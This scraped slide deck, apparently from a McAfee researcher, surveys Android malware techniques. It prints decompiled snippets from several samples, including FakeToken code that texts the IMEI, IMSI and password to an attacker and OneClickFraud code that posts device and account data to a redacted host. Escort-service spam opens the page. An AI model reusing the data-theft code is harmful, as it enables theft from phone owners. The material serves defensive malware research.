BDSM⚡Call Girls in Sector 71 Noida Escorts >༒8448380779 Escort Service
BDSM⚡Call Girls in Sector 71 Noida Escorts >༒8448380779 Escort ServiceBDSM⚡Call Girls in Sector 71 Noida Escorts >༒8448380779 Escort Service
BDSM⚡Call Girls in Sector 71 Noida Escorts >༒8448380779 Escort Service
 
CALL ON ➥8923113531 🔝Call Girls Gomti Nagar Lucknow best Night Fun service
CALL ON ➥8923113531 🔝Call Girls Gomti Nagar Lucknow best Night Fun serviceCALL ON ➥8923113531 🔝Call Girls Gomti Nagar Lucknow best Night Fun service
CALL ON ➥8923113531 🔝Call Girls Gomti Nagar Lucknow best Night Fun service
 

Isn't it all just SMS-sending trojans?: Real Advances in Android Malware

  • 1. McAfee Confidential—Internal Use Only Isn't it all just SMS-sending trojans?: Real advances in Android Malware Jimmy Shah Mobile Security Researcher
  • 2. Let's look at the numbers
  • 3. Not just malware ... 0.0% 10.0% 20.0% 30.0% 40.0% 50.0% 60.0% 70.0% 80.0% 90.0% 100.0% 49.3% 50.7% Malware vs PUP
  • 4. Almost everything but SMS-sending trojans Send Handset Info Spyware Adware Sends Premium SMS Fraud Exploit Rooting malware Backdoor/Botnet HackTool Downloader/Installer 0.0% 5.0% 10.0% 15.0% 20.0% 25.0% 30.0% 35.0% 40.0% 45.0% 42.0% 21.7% 8.7% 18.8% 2.9% 23.2% 2.9% 27.5% 4.3% 10.1% By Category
  • 6. Attacker Tricks - Encryption • Simple – Obfuscations • Hiding SMS numbers/message text within plaintext HTML files – Substitution cipher • Config file containing encrypted SMS numbers/message text <link rel="stylesheet" type="text/css" href="/en/shar ed/core/2/css/css.ashx?sc=/en/us/site.config&amp;pt=cspMscomHomePage&amp;c=cspMscomSiteBrand;cspSearchComponent ;cspMscomFeaturePanel;cspMscomMasterNavigation;[<SMS#>:<MSG>]cspMscomNewsBand;cspVerticalRolloverTab;cspAdControl;cspMscomVe rticalTab;cspSilverGate" /><script type="text/javascript" src="http//i3.microsoft.com/library/svy/broker.js"> </script><meta name="SearchTitle" content="Microsoft.com" scheme="" /><meta name="Description" content="Get product information, support, and news from Microsoft." scheme="" /><meta name="Title" content="Microsoft.c <SMS#>::<MSG>::241.55руб. <SMS#>::<MSG>::173.88руб. <SMS#>::<MSG>::86.00руб.
  • 7. Attacker Tricks - Encryption • Complex – Symmetric cipher • DES • Encrypt URL queries and C&C commands • Encrypt/decrypt config file – URLs, next connect time – Encrypt/decrypt C&C commands – Decrypt root exploits byte abyte1[] = k.b; DESKeySpec deskeyspec = new DESKeySpec(abyte1); javax.crypto.SecretKey secretkey = SecretKeyFactory.getInstance("DES").generateSecret(deskeyspec); Cipher cipher = Cipher.getInstance("DES"); b = cipher; cipher.init(2, secretkey);
  • 8. Attacker Tricks – Fraud • Pretending to be a legitimate app – Not the same as injecting malicious code – New or reused code that simulates the real app • Includes malicious functions • Almost just malicious code ./com/example/android/service/KitchenTimerService$KitchenTimerBinder.class ./com/example/android/service/R$id.class ./com/example/android/service/R$raw.class ./com/example/android/service/Main$KitchenTimerReceiver.class ./com/example/android/service/KitchenTimerService$2.class ./com/example/android/service/R$attr.class ./com/example/android/service/R$layout.class ./com/example/android/service/R.class ./com/example/android/service/Main.class ./com/example/android/service/R$drawable.class ./com/example/android/service/KitchenTimerService$1.class ./com/example/android/service/KitchenTimerService.class ./com/example/android/service/Main$1.class ./com/example/android/service/R$string.class ./token/bot/StartSettings.class ./token/bot/WebApi.class ./token/bot/CatchResult.class ./token/bot/SendSmsResult.class ./token/bot/SettingsSet.class ./token/bot/ScreenItem.class ./token/bot/AutorunReceiver.class ./token/bot/ServerResponse.class ./token/bot/MainActivity.class ./token/bot/ThreadOperation.class ./token/bot/AlarmReceiver.class ./token/bot/ThreadOperationListener.class ./token/bot/SmsReciver.class ./token/bot/MainApplication.class ./token/bot/MainService.class ./token/bot/SmsItem.class ./token/bot/HttpParam.class ./token/bot/Settings.class ./token/bot/UpdateActivity.class ./token/bot/MainActivity$1.class Android/OneClickFraud Android/FakeToken
  • 9. Attacker Tricks – Fraud • Android/FakeToken – Fake security token app • Customized for different banks – App asks for the user's password and displays fake soft token public void sendPass(String paramString) { try { if (!Settings.saved.sendInitSms) { Settings.saved.sendInitSms = true; String str = Settings.saved.smsPrefix + " INIT " + MainApplication.imei + " " + MainApplication.imsi + " " + paramString; MainService.sendSms(Settings.saved.number, str); MainApplication.settings.save(this.context); } new Thread(new ThreadOperation(this, 1, paramString)).start(); label109: return; } catch (Exception localException) { break label109; } }
  • 10. Attacker Tricks – Fraud • Android/OneClickFraud – Fake adult entertainment app • App asks for the user to pay for a subscription to the adult site – Repeats every 5 minutes public void onReceive(Context paramContext, Intent paramIntent) { kitchenTimerService.schedule(300000L); setContentView(2130903040); Account[] arrayOfAccount;
  • 11. Attacker Tricks – Fraud • Android/OneClickFraud – Sends user information including Google account to the attacker if (ctf.intValue() == 0) { Main localMain = Main.this; Integer localInteger = Integer.valueOf(1); localMain.ctf = localInteger; TelephonyManager localTelephonyManager = (TelephonyManager)getSystemService("phone"); arrayOfAccount = AccountManager.get(Main.this).getAccounts(); str1 = ""; int i = arrayOfAccount.length; j = 0; if (j >= i) { String str2 = doPost("http://<removed>", ""); StringBuilder localStringBuilder1 = new StringBuilder("http://<removed>"); String str3 = localTelephonyManager.getDeviceId(); StringBuilder localStringBuilder2 = localStringBuilder1.append(str3).append("&telno="); String str4 = localTelephonyManager.getLine1Number(); Uri localUri1 = Uri.parse(str4 + "&m_addr=" + str1 + "&usr_id=" + str2); Intent localIntent1 = new Intent("android.intent.action.VIEW", localUri1); startActivity(localIntent1); boolean bool = moveTaskToBack(1); } }
  • 12. 4/19/1212 Attacker Tricks - Injecting code • Android/Moghava.A – Malicious code injected into a legitimate app • Recipes for Iranian meals
  • 13. 4/19/1213 Attacker Tricks - Injecting code • Android/Moghava.A – Real virus • Overwriting file infector – Not executable files, just image files » Specifically all of your JPGs » Designed to “photo bomb” all your photos with the Ayotollah Khomeni • Code injection: – Buggy • Doesn't check if it's infected a file before ./com/Moghava/kicker.smali ./com/Moghava/stamper$1.smali ./com/Moghava/stamper$1$1.smali ./com/Moghava/stamper.smali ./ir/sharif/iranianfoods/R$attr.smali ./ir/sharif/iranianfoods/R$styleable.smali ./ir/sharif/iranianfoods/R$menu.smali ./ir/sharif/iranianfoods/ListItemAdapter.smali ./ir/sharif/iranianfoods/IranData.smali ./ir/sharif/iranianfoods/Touch$AddImgAdp.smali ./ir/sharif/iranianfoods/TabHostActivity.smali ./ir/sharif/iranianfoods/Constants.smali
  • 14. 4/19/1214 Attacker Tricks - Injecting code localBitmap1 = BitmapFactory.decodeResource(this$0.getResources(), 2130837505); localBitmap2 = BitmapFactory.decodeFile(localFile2.getPath()); int m = localBitmap2.getWidth(); int n = localBitmap1.getWidth(); int i1 = m; int i2 = n; if (i1 > i2) { i3 = localBitmap2.getWidth(); i4 = localBitmap2.getHeight(); label122: Bitmap.Config localConfig = Bitmap.Config.ARGB_8888; localBitmap3 = Bitmap.createBitmap(i3, i4, localConfig); Canvas localCanvas = new Canvas(localBitmap3); float f1 = 0.0F; float f2 = 0.0F; Paint localPaint1 = null; localCanvas.drawBitmap(localBitmap2, f1, f2, localPaint1); float f3 = 100.0F; float f4 = 300.0F; Paint localPaint2 = null; localCanvas.drawBitmap(localBitmap1, f3, f4, localPaint2); }
  • 15. 4/19/1215 Attacker Tricks - Injecting code Credit: Mark Peters (Flickr ID - sneakerdog)
  • 16. 4/19/1216 Attacker Tricks – Recording Audio • Audio – DTMF(“Touch Tones”) – Telephone Calls • Initially used in academic PoCs – SoundComber • DB of IVR Converted DTMF • January 2011 • Very common in spyware • Used in malware
  • 17. 4/19/1217 Attacker Tricks – Recording Audio • Android/Nickispy – Records to AMR files – August 2011 • Android/GoldenEagle – Records to AMR files – September 2011 • Audio recording benefits – Trade secrets – CC# – PINs
  • 18. 4/19/1218 Attacker Tricks - Malware Updates • Malware authors are now including update functionality – Keeping the profits rolling in and maintaining control of devices – Initially just used by mobile botnet clients • Generally only requires the permission INSTALL_PACKAGES • android.permission.INSTALL_PACKAGES • There are two main ways users are attacked – Fake legitimate updates • Ex: SYSTEM_PATCH, Android_4.0_patch • Really just trojan horses – Malware updating itself • More functions – Send sensitive user info – Exfiltrate data • New/patched payloads – Exploits
  • 19. 4/19/1219 Attacker Tricks - Malware Updates • Real malware updates – Because even the bad guys understand that sometimes you need to patch • Usually not visual – Don't inform the users/victims – Don't depend on users to approve updates
  • 20. 4/19/1220 Academic Research - Taplogger • Taplogger – Combination training and attack app • Reads accelerometer for keypresses • Training app is a fake icon matching game – High score = trained it to steal your pin • Two attacks – Number pad logging » PINs, CC#s,etc. – Password stealing » Screen unlock – Previous research • Touchlogger – Two parts – training and logging • ACCessory – Detects full keyboard
  • 22. Attacker Tricks - Rooting Exploits • Rooting Android – Good for improving security, but can leave you open to attack – Replacing firmware – Removing bloatware and security vulnerabilities • Most attackers are not interested in developing their own exploits – Function of slow patching on Android and number of parties involved in releasing new firmware • “too many chefs in the kitchen” – Leads to the same three or four common exploits and minor modifications Exploit Detected as PSneuter Exploit/RetuenSP.A Gingerbreak Exploit/Voldbrk, 18 minor variants of the same exploit Exploid Exploit/Lvedu, 26 minor variants RageAgainstTheCage Exploit/Diutes, 5 minor variants
  • 23. Attacker Tricks – Server-Side Polymorphism • Server-side – Uses larger resources server side vs. lower powered devices – Modifying DEX files • Manual changes – Renaming source and recompiling • Automated changes – Easier than it sounds – Scriptable text changes in source
  • 24. Attacker Tricks – Server-Side Polymorphism • One major family: Android/FakeInstaller • Main generic signature • Supplementary detections for 25 variants • Changes – By day – By hour
  • 26. Acknowledgments • Zhi Xu, Kun Bai, and Sencun Zhu for the background on their Taplogger research.

Hinweis der Redaktion

  1. A lot of SMS sending trojans use very simple encryption or obfuscation. The top one hides the SMS number and message in a standard HTML file. It looks like the attacker possible modified a standard Microsoft provided HTML file. If you&amp;apos;re not looking for it you&amp;apos;d miss it. Others use very simple substitution ciphers. All of this just to make it less obvious what the SMS number and message are. Of course if you have the binary, these are easy to reverse.
  2. More advanced malware uses better algorithms like DES. Geinimi uses DES to encrypt its CC traffic and URL queries.
  3. This is a research PoC. It&amp;apos;s in two parts, a desktop application to identify keystrokes from accelrometer readings and eventually an app that uses the derived keystroke/touch databse to identify indiividual numbers. Future imporvements include expanding from a custom keyboard to the default on-screen keyboard and identification of letters. The attacker profits initially by identifying when numbers are enterd These can be cc#, SS# or PINs. Future work could capture passwords, acount names and other sensitive data.
  4. Botnets are pretty straightforward. They&amp;apos;re basically client server networks where the clients are infected machines. An attacker infects a large number of machines or devices and then has their command and control server. Command and control can varie from the simple single server to a network of redundant servers. Botnets are good for performing attacks against targets(ddos, phishing, etc.) and for gathering informatin, Personally identifiable information, financial records and other confidential informatioon. Depending on how complex they are the botnet clients may also utilize features of rootkits.